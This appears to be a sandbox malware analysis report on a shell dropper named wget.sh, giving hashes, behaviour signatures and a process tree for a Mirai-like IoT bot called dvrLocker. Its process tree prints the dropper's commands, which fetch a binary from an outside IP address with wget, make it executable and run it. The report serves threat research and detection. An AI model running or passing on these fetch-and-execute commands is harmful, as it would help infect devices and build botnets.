Analysis
-
max time kernel
149s -
max time network
112s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 09:41
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
420B
-
MD5
878878ef9a55d128c2917bfb365e4261
-
SHA1
3f95d013d7602c813cafd4be15c43c37a9c71d2e
-
SHA256
bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a
-
SHA512
dfb89655ef3662bb93b765211863cdff5101a00edf9f45b741e8c401402ec429196cf97b4c4e54dfbfc7153b3c50c2ae9da5e3fab45d51a96f0f25ca6c365cf6
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 677 chmod 682 chmod 694 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /mnt/dvrLocker 678 dvrLocker -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog dvrLocker File opened for modification /dev/misc/watchdog dvrLocker -
Renames itself 2 IoCs
pid Process 678 dvrLocker 678 dvrLocker -
Reads process memory 1 TTPs 1 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/1/maps dvrLocker -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself telnetd 678 dvrLocker -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.cc wget.sh
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵
- Writes file to tmp directory
PID:647 -
/bin/rmrm -rf dvrLocker2⤵PID:648
-
-
/usr/bin/wgetwget http://103.149.87.69/a/b/la.bot.arm -O -2⤵PID:650
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:677
-
-
/mnt/dvrLocker./dvrLocker2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Reads process memory
- Changes its process name
PID:678
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:682
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:694
-
-
/bin/rmrm -rf dvrLocker2⤵PID:708
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD5be76a190f3b90d5cb00a5cbc15b112a4
SHA1da8903c31f36952390ff4975683504b9ceff05ea
SHA2569258876ed0aaf0ff28b2b68c5e1ebac8680d7dc8b5de2f67e198035b1f1d545e
SHA5120ef32ef56b4cd888974fc1e900be3956ef23e447b4efb3c1231b11dd77596455b9a5f2927c11f2380308deeb5e97b1a8afd76c350d2d70daea9c1b862934b771